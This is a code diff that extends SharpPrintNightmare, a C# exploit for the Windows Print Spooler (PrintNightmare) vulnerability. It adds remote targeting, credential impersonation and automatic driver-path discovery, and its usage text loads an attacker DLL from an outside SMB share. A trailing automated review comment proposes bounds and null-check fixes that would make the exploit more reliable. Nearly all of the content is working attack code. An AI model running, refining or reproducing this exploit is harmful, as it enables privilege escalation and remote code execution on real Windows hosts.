|
|
@ -2,6 +2,7 @@ |
|
|
|
using System.ComponentModel; |
|
|
|
using System.ComponentModel; |
|
|
|
using System.IO; |
|
|
|
using System.IO; |
|
|
|
using System.Runtime.InteropServices; |
|
|
|
using System.Runtime.InteropServices; |
|
|
|
|
|
|
|
using Tools; |
|
|
|
|
|
|
|
|
|
|
|
namespace SharpPrintNightmare |
|
|
|
namespace SharpPrintNightmare |
|
|
|
{ |
|
|
|
{ |
|
|
@ -45,30 +46,81 @@ namespace SharpPrintNightmare |
|
|
|
static void Main(string[] args) |
|
|
|
static void Main(string[] args) |
|
|
|
{ |
|
|
|
{ |
|
|
|
string dllpath; |
|
|
|
string dllpath; |
|
|
|
|
|
|
|
string pDriverPath = ""; |
|
|
|
|
|
|
|
string path = null; |
|
|
|
|
|
|
|
//network credentials wont be used for LPE |
|
|
|
|
|
|
|
string domain = "NeverGonnaGiveYouUp"; |
|
|
|
|
|
|
|
string user = "NeverGonnaLetYouDown"; |
|
|
|
|
|
|
|
string password = "NeverGonnaRunAroundAndDesertYou"; |
|
|
|
|
|
|
|
|
|
|
|
if (args == null || args.Length == 0) |
|
|
|
if (args == null || args.Length == 0) |
|
|
|
{ |
|
|
|
{ |
|
|
|
Console.WriteLine("Need an argument containing the dll path"); |
|
|
|
Console.WriteLine("-Locally"); |
|
|
|
Console.WriteLine(".\\SharpPrintNightmare.exe C:\\addCube.dll"); |
|
|
|
Console.WriteLine(" .\\SharpPrintNightmare.exe C:\\addCube.dll"); |
|
|
|
|
|
|
|
Console.WriteLine(" .\\SharpPrintNightmare.exe 'C:\\addCube.dll' 'C:\\Windows\\System32\\DriverStore\\FileRepository\\ntprint.inf_amd64_83aa9aebf5dffc96\\Amd64\\UNIDRV.DLL'"); |
|
|
|
|
|
|
|
Console.WriteLine("-Remote using current context"); |
|
|
|
|
|
|
|
Console.WriteLine(" .\\SharpPrintNightmare.exe '\\\\192.168.1.215\\smb\\addCube.dll' 'C:\\Windows\\System32\\DriverStore\\FileRepository\\ntprint.inf_amd64_83aa9aebf5dffc96\\Amd64\\UNIDRV.DLL' '\\\\192.168.1.20'"); |
|
|
|
|
|
|
|
Console.WriteLine("-Remote using runas"); |
|
|
|
|
|
|
|
Console.WriteLine(" .\\SharpPrintNightmare.exe '\\\\192.168.1.215\\smb\\addCube.dll' 'C:\\Windows\\System32\\DriverStore\\FileRepository\\ntprint.inf_amd64_83aa9aebf5dffc96\\Amd64\\UNIDRV.DLL' '\\\\192.168.1.20' hackit.local domain_user Pass123"); |
|
|
|
Environment.Exit(0); |
|
|
|
Environment.Exit(0); |
|
|
|
} |
|
|
|
} |
|
|
|
dllpath = args[0]; |
|
|
|
dllpath = args[0]; |
|
|
|
|
|
|
|
|
|
|
|
Console.WriteLine("[*] Try 1..."); |
|
|
|
if(args.Length > 1) |
|
|
|
addPrinter(dllpath); |
|
|
|
{ |
|
|
|
Console.WriteLine("[*] Try 2..."); |
|
|
|
pDriverPath = args[1]; |
|
|
|
addPrinter(dllpath); |
|
|
|
} |
|
|
|
Console.WriteLine("[*] Try 3..."); |
|
|
|
else |
|
|
|
addPrinter(dllpath); |
|
|
|
{ |
|
|
|
|
|
|
|
DRIVER_INFO_2[] drivers = getDrivers(); |
|
|
|
|
|
|
|
foreach (DRIVER_INFO_2 driver in drivers) |
|
|
|
|
|
|
|
{ |
|
|
|
|
|
|
|
//Console.WriteLine(driver.pDriverPath); //debug |
|
|
|
|
|
|
|
if (driver.pDriverPath.ToLower().Contains("filerepository")) |
|
|
|
|
|
|
|
{ |
|
|
|
|
|
|
|
pDriverPath = driver.pDriverPath; |
|
|
|
|
|
|
|
break; |
|
|
|
|
|
|
|
} |
|
|
|
|
|
|
|
} |
|
|
|
|
|
|
|
//lucky shot |
|
|
|
|
|
|
|
if (pDriverPath == "") |
|
|
|
|
|
|
|
{ |
|
|
|
|
|
|
|
pDriverPath = drivers[0].pDriverPath; |
|
|
|
|
|
|
|
} |
|
|
|
|
|
|
|
pDriverPath = Directory.GetParent(pDriverPath).FullName + "\\UNIDRV.DLL"; |
|
|
|
|
|
|
|
} |
|
|
|
|
|
|
|
if (args.Length > 2) |
|
|
|
|
|
|
|
{ |
|
|
|
|
|
|
|
path = args[2]; |
|
|
|
|
|
|
|
} |
|
|
|
|
|
|
|
if (args.Length > 3) |
|
|
|
|
|
|
|
{ |
|
|
|
|
|
|
|
domain = args[3]; |
|
|
|
|
|
|
|
user = args[4]; |
|
|
|
|
|
|
|
password = args[5]; |
|
|
|
|
|
|
|
} |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
//runas /netonly |
|
|
|
|
|
|
|
using (new Impersonator.Impersonation(domain, user, password)) |
|
|
|
|
|
|
|
{ |
|
|
|
|
|
|
|
Console.WriteLine("[*] Try 1..."); |
|
|
|
|
|
|
|
addPrinter(dllpath, pDriverPath, path); |
|
|
|
|
|
|
|
Console.WriteLine("[*] Try 2..."); |
|
|
|
|
|
|
|
addPrinter(dllpath, pDriverPath, path); |
|
|
|
|
|
|
|
Console.WriteLine("[*] Try 3..."); |
|
|
|
|
|
|
|
addPrinter(dllpath, pDriverPath, path); |
|
|
|
|
|
|
|
} |
|
|
|
} |
|
|
|
} |
|
|
|
|
|
|
|
|
|
|
|
static void addPrinter(string dllpath) |
|
|
|
static void addPrinter(string dllpath, string pDriverPath, string path = null) |
|
|
|
{ |
|
|
|
{ |
|
|
|
DRIVER_INFO_2[] drivers = getDrivers(); |
|
|
|
|
|
|
|
string pDriverPath = Directory.GetParent(drivers[0].pDriverPath).FullName + "\\UNIDRV.DLL"; |
|
|
|
//pDriverPath = "C:\\Windows\\System32\\DriverStore\\FileRepository\\ntprint.inf_amd64_83aa9aebf5dffc96\\Amd64\\UNIDRV.DLL"; // 2019 debug |
|
|
|
Console.WriteLine($"[*] pDriverPath Found {pDriverPath}"); |
|
|
|
//pDriverPath = "C:\\Windows\\System32\\DriverStore\\FileRepository\\ntprint.inf_amd64_addb31f9bff9e936\\Amd64\\UNIDRV.DLL"; // 2016 debug |
|
|
|
|
|
|
|
Console.WriteLine($"[*] pDriverPath {pDriverPath}"); |
|
|
|
Console.WriteLine($"[*] Executing {dllpath}"); |
|
|
|
Console.WriteLine($"[*] Executing {dllpath}"); |
|
|
|
|
|
|
|
|
|
|
|
//DRIVER_INFO_2 Level2 = drivers[0]; |
|
|
|
//DRIVER_INFO_2 Level2 = drivers[0]; // debug |
|
|
|
DRIVER_INFO_2 Level2 = new DRIVER_INFO_2(); |
|
|
|
DRIVER_INFO_2 Level2 = new DRIVER_INFO_2(); |
|
|
|
Level2.cVersion = 3; |
|
|
|
Level2.cVersion = 3; |
|
|
|
Level2.pConfigFile = "C:\\Windows\\System32\\kernelbase.dll"; |
|
|
|
Level2.pConfigFile = "C:\\Windows\\System32\\kernelbase.dll"; |
|
|
@ -85,7 +137,7 @@ namespace SharpPrintNightmare |
|
|
|
Marshal.StructureToPtr(Level2, pnt, false); |
|
|
|
Marshal.StructureToPtr(Level2, pnt, false); |
|
|
|
|
|
|
|
|
|
|
|
//call AddPrinterDriverEx |
|
|
|
//call AddPrinterDriverEx |
|
|
|
AddPrinterDriverEx(null, 2, pnt, flags); |
|
|
|
AddPrinterDriverEx(path, 2, pnt, flags); |
|
|
|
Console.WriteLine("[*] Stage 0: " + Marshal.GetLastWin32Error()); |
|
|
|
Console.WriteLine("[*] Stage 0: " + Marshal.GetLastWin32Error()); |
|
|
|
Marshal.FreeHGlobal(pnt); |
|
|
|
Marshal.FreeHGlobal(pnt); |
|
|
|
|
|
|
|
|
|
|
@ -98,10 +150,10 @@ namespace SharpPrintNightmare |
|
|
|
Marshal.StructureToPtr(Level2, pnt2, false); |
|
|
|
Marshal.StructureToPtr(Level2, pnt2, false); |
|
|
|
|
|
|
|
|
|
|
|
//call AddPrinterDriverEx |
|
|
|
//call AddPrinterDriverEx |
|
|
|
AddPrinterDriverEx(null, 2, pnt2, flags); |
|
|
|
AddPrinterDriverEx(path, 2, pnt2, flags); |
|
|
|
int errorcode = Marshal.GetLastWin32Error(); |
|
|
|
int errorcode = Marshal.GetLastWin32Error(); |
|
|
|
Marshal.FreeHGlobal(pnt2); |
|
|
|
Marshal.FreeHGlobal(pnt2); |
|
|
|
if(errorcode == 0) |
|
|
|
if (errorcode == 0) |
|
|
|
{ |
|
|
|
{ |
|
|
|
Console.WriteLine($"[*] Stage {i}: " + errorcode); |
|
|
|
Console.WriteLine($"[*] Stage {i}: " + errorcode); |
|
|
|
Console.WriteLine($"[+] Exploit Completed"); |
|
|
|
Console.WriteLine($"[+] Exploit Completed"); |
|
|
@ -110,11 +162,13 @@ namespace SharpPrintNightmare |
|
|
|
} |
|
|
|
} |
|
|
|
} |
|
|
|
} |
|
|
|
|
|
|
|
|
|
|
|
static DRIVER_INFO_2[] getDrivers() |
|
|
|
static DRIVER_INFO_2[] getDrivers(string path = null) |
|
|
|
{ |
|
|
|
{ |
|
|
|
uint cbNeeded = 0; |
|
|
|
uint cbNeeded = 0; |
|
|
|
uint cReturned = 0; |
|
|
|
uint cReturned = 0; |
|
|
|
if (EnumPrinterDrivers(null, null, 2, IntPtr.Zero, 0, ref cbNeeded, ref cReturned)) |
|
|
|
//path = "\\\\192.168.1.20"; |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
if (EnumPrinterDrivers(path, "Windows x64", 2, IntPtr.Zero, 0, ref cbNeeded, ref cReturned)) |
|
|
|
{ |
|
|
|
{ |
|
|
|
//succeeds, but shouldn't, because buffer is zero (too small)! |
|
|
|
//succeeds, but shouldn't, because buffer is zero (too small)! |
|
|
|
throw new Exception("EnumPrinters should fail!"); |
|
|
|
throw new Exception("EnumPrinters should fail!"); |
|
|
@ -128,7 +182,7 @@ namespace SharpPrintNightmare |
|
|
|
} |
|
|
|
} |
|
|
|
|
|
|
|
|
|
|
|
IntPtr pAddr = Marshal.AllocHGlobal((int)cbNeeded); |
|
|
|
IntPtr pAddr = Marshal.AllocHGlobal((int)cbNeeded); |
|
|
|
if (EnumPrinterDrivers(null, null, 2, pAddr, cbNeeded, ref cbNeeded, ref cReturned)) |
|
|
|
if (EnumPrinterDrivers(path, "Windows x64", 2, pAddr, cbNeeded, ref cbNeeded, ref cReturned)) |
|
|
|
{ |
|
|
|
{ |
|
|
|
DRIVER_INFO_2[] printerInfo2 = new DRIVER_INFO_2[cReturned]; |
|
|
|
DRIVER_INFO_2[] printerInfo2 = new DRIVER_INFO_2[cReturned]; |
|
|
|
long offset; |
|
|
|
long offset; |
|
|
|
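Review bot: In the new `Main`, the credential block is guarded by `if (args.Length > 3)` but then reads `args[4]` and `args[5]`, so an invocation with four or five arguments throws `IndexOutOfRangeException` instead of reaching the usage text. The guard should match the highest index read, `if (args.Length > 5)`, with four or five arguments routed to the usage branch. The driver-path fallback in the same function reads `drivers[0].pDriverPath` without checking that `getDrivers()` returned any entries, and `Directory.GetParent(pDriverPath)` can return null for a root path, so both need a guard before they are dereferenced. `driver.pDriverPath.ToLower().Contains("filerepository")` is culture-sensitive; `IndexOf("filerepository", StringComparison.OrdinalIgnoreCase) >= 0` avoids that.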